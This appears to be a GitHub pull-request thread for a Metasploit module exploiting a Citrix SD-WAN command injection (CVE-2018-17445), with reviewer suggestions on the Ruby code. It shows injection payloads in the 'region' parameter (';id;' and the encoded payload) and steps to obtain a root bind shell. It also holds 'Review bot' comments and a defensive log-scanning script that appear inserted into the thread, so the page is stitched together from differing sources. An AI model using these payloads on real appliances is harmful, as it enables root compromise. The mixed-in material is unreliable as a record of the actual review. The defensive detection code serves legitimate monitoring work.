Add Citrix SD-WAN Command Injection module #11177

Open. Wants to merge 1 commit into base: master.
6 participants
neoleksov (Contributor) commented Dec 26, 2018

This module exploits an arbitrary command execution vulnerability in Citrix SD-WAN.
This vulnerability can allow an attacker to execute arbitrary commands with root privileges.
An attacker who has gained access to the operating system can escalate their privileges to root using the "sudo -i" command.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use unix/webapp/citrix_command_injection
  • set payload cmd/unix/bind_awk
  • set RHOSTS <r_host>
  • set RPORT <r_port>
  • set SSL <true/false>
  • set LHOST <l_host>
  • set LPORT <l_port>
  • check
  • Verify that the host is vulnerable.
  • run
  • Verify that the module opens a socket with a bash session on l_host:l_port.
'region' => ';id;'
}
)
if res.code == 200 and /uid=/ =~ res.body
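Review bot: `res.code` is dereferenced here without a nil guard; `send_request_cgi` returns nil when the connection fails, so a refused or timed-out connection raises NoMethodError inside `check` instead of returning `CheckCode::Unknown`. Add `return CheckCode::Unknown unless res` before the comparison, and use `&&` rather than `and` so the condition reads the same way as the rest of the module's Ruby.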

Green-m (Contributor) commented Dec 27, 2018

You do not need to catch it yourself; the send_request_cgi method will catch the ::Rex::ConnectionError exception and return nil. Moreover, fail_with is invalid in the check method.
Here is my suggestion:

unless res
  print_bad("Could not connect to the web service")
  # return is needed here, otherwise execution falls through to res.code on nil
  return Exploit::CheckCode::Unknown
end

if res.code == 200 && /uid=/ =~ res.body
  Exploit::CheckCode::Vulnerable
else
  Exploit::CheckCode::Safe
end

bcoles (Contributor) commented Dec 28, 2018

For a check method, the `vprint_*` methods should be used rather than `print_*`.

Also the arguments for the regex check should be reversed.

  def check
    res = send_request_cgi(
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, 'storageMigrationCompleted.php'),
      'vars_get' => {
        'region' => ';id;'
      }
    )

    unless res
      vprint_bad("Could not connect to the web service")
      return CheckCode::Unknown
    end

    if res.code == 200 && res.body =~ /uid=/
      return CheckCode::Vulnerable
    end

    CheckCode::Safe
  end
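A defender-side counterpart to the check request above, added here as an example and not part of the PR or the Metasploit module: it scans web-server access-log lines for requests to the `storageMigrationCompleted.php` path whose `region` parameter carries shell metacharacters, which is the shape of both the check probe (`;id;`) and the exploit request. The log lines are constructed, and the metacharacter set and the combined-log-format request regex are assumptions.

```ruby
require 'uri'

# Constructed sample access-log lines (common log format); not real traffic.
SAMPLE_LOG = <<~LOG
  10.0.0.5 - - [16/Jan/2019:10:00:01 +0000] "GET /storageMigrationCompleted.php?region=us-east HTTP/1.1" 200 512
  10.0.0.9 - - [16/Jan/2019:10:00:07 +0000] "GET /storageMigrationCompleted.php?region=%3Bid%3B HTTP/1.1" 200 812
  10.0.0.9 - - [16/Jan/2019:10:00:09 +0000] "GET /index.php?page=home HTTP/1.1" 200 2048
  10.0.0.9 - - [16/Jan/2019:10:00:12 +0000] "GET /storageMigrationCompleted.php?region=us-west%7Cid HTTP/1.1" 200 1024
LOG

# Path and parameter named in the PR diff; the module injects into 'region'.
TARGET_PATH  = '/storageMigrationCompleted.php'
TARGET_PARAM = 'region'

# Shell metacharacters a legitimate region name would not contain (assumption).
META = /[;|&`$<>\n]/

# Request line inside a combined/common log entry (assumed format).
REQUEST_RE = /"(?<method>[A-Z]+) (?<target>\S+) HTTP\/[\d.]+"/

# Parse one log line into method, path and percent-decoded query parameters.
# Returns nil for lines that do not carry a parseable request.
def parse_request(line)
  m = REQUEST_RE.match(line)
  return nil unless m

  uri    = URI.parse(m[:target])
  params = uri.query ? URI.decode_www_form(uri.query).to_h : {}
  { method: m[:method], path: uri.path, params: params }
rescue URI::InvalidURIError
  nil
end

# True when the request targets the vulnerable path and the injected
# parameter contains a shell metacharacter after URL decoding.
def suspicious?(req)
  return false unless req && req[:path] == TARGET_PATH

  value = req[:params][TARGET_PARAM]
  !value.nil? && META.match?(value)
end

# Scan a whole log text; return one hit per suspicious line.
def scan(log_text)
  hits = []
  log_text.each_line.with_index(1) do |line, no|
    req = parse_request(line)
    next unless suspicious?(req)

    hits << { line: no, client: line.split(' ').first, region: req[:params][TARGET_PARAM] }
  end
  hits
end

if __FILE__ == $PROGRAM_NAME
  scan(SAMPLE_LOG).each do |hit|
    puts "line #{hit[:line]} #{hit[:client]} region=#{hit[:region].inspect}"
  end
end
```

Decoding the query before matching matters: the probe arrives as `%3Bid%3B`, so a rule that looks for a literal `;` in the raw request line misses it.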
'region' => ";#{payload.encoded};"
}
)
rescue ::Rex::ConnectionError
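Review bot: the `rescue ::Rex::ConnectionError` here is dead code, because `send_request_cgi` already rescues that exception and returns nil; the exploit path should instead test `res` for nil and call `fail_with(Failure::Unreachable, 'Could not connect to the web service')`. Moving this request into an `execute_command(cmd, opts = {})` method, as bcoles suggests later in the thread, would also let the module use the command stager mixin instead of sending the encoded payload directly in `region`.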

Green-m (Contributor) commented Dec 27, 2018

See comment above.

bcoles (Contributor) left a comment

It should be pretty easy to add support for a command stager to this module, by wrapping the send_request_cgi method call in an execute_command method.

@@ -0,0 +1,91 @@
##
# This module requires Metasploit: http://metasploit.com/download
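Review bot: the header comment links to `http://metasploit.com/download`; current modules use `https://metasploit.com/download`. The hunk also adds a 91-line module with no accompanying documentation file, which reviewers request twice below; Metasploit's convention is a Markdown file under `documentation/modules/exploit/unix/webapp/` named after the module.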

bcoles (Contributor) commented Dec 28, 2018

Suggested change:

- # This module requires Metasploit: http://metasploit.com/download
+ # This module requires Metasploit: https://metasploit.com/download
'References' =>
[
['CVE', '2018-17445'],
['URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17445'],

bcoles (Contributor) commented Dec 28, 2018

This URL is made redundant by the CVE line above.

Consider adding these instead:

Suggested change:

- ['URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17445'],
+ ['BID', '105711'],
+ ['URL', 'https://support.citrix.com/article/CTX236992']
[
Opt::RPORT(443),
OptString.new('TARGETURI', [true, 'Path to WebService', '/'])
], self.class
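Review bot: `self.class` is an obsolete second argument to `register_options` and should be dropped. Separately, `Opt::RPORT(443)` sets an HTTPS port as the default while the verification steps still require `set SSL <true/false>` by hand; defaulting `SSL` to true in `DefaultOptions` would stop the check from speaking plaintext HTTP to port 443 out of the box.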

bcoles (Contributor) commented Dec 28, 2018

self.class is redundant here.

Suggested change:

- ], self.class
+ ]

wvu-r7 changed the title from "Add Citrix Command Injection module" to "Add Citrix SD-WAN Command Injection module" on Jan 3, 2019

wvu-r7 (Contributor) left a comment

Since this is a vulnerability in Citrix SD-WAN, consider renaming the module to match. Citrix makes a lot of products.

jrobles-r7 self-assigned this Jan 4, 2019

jrobles-r7 (Contributor) commented Jan 9, 2019

Hello. I tried a few downloads from Citrix but I wasn't able to get this module to work. Could you provide a link to a specific download that is known to work? Preferably an OVA.

Please add module documentation as well.

neoleksov force-pushed the neoleksov:citrix_command_injection branch from ac6ecbe to e3b643b on Jan 16, 2019

neoleksov (Contributor) commented Jan 16, 2019

> Hello. I tried a few downloads from Citrix but I wasn't able to get this module to work. Could you provide a link to a specific download that is known to work? Preferably an OVA.

Hello. I used AWS, but only the latest version is available now, and it is not vulnerable to this attack.

neoleksov force-pushed the neoleksov:citrix_command_injection branch from e3b643b to 5b8545c on Jan 16, 2019

wvu-r7 approved these changes Jan 16, 2019

jrobles-r7 (Contributor) commented Jan 16, 2019

@neoleksov do you still have access to a vulnerable instance? If you do please send a pcap of the module working to msfdev [at] metasploit com.

Also, please add module documentation.
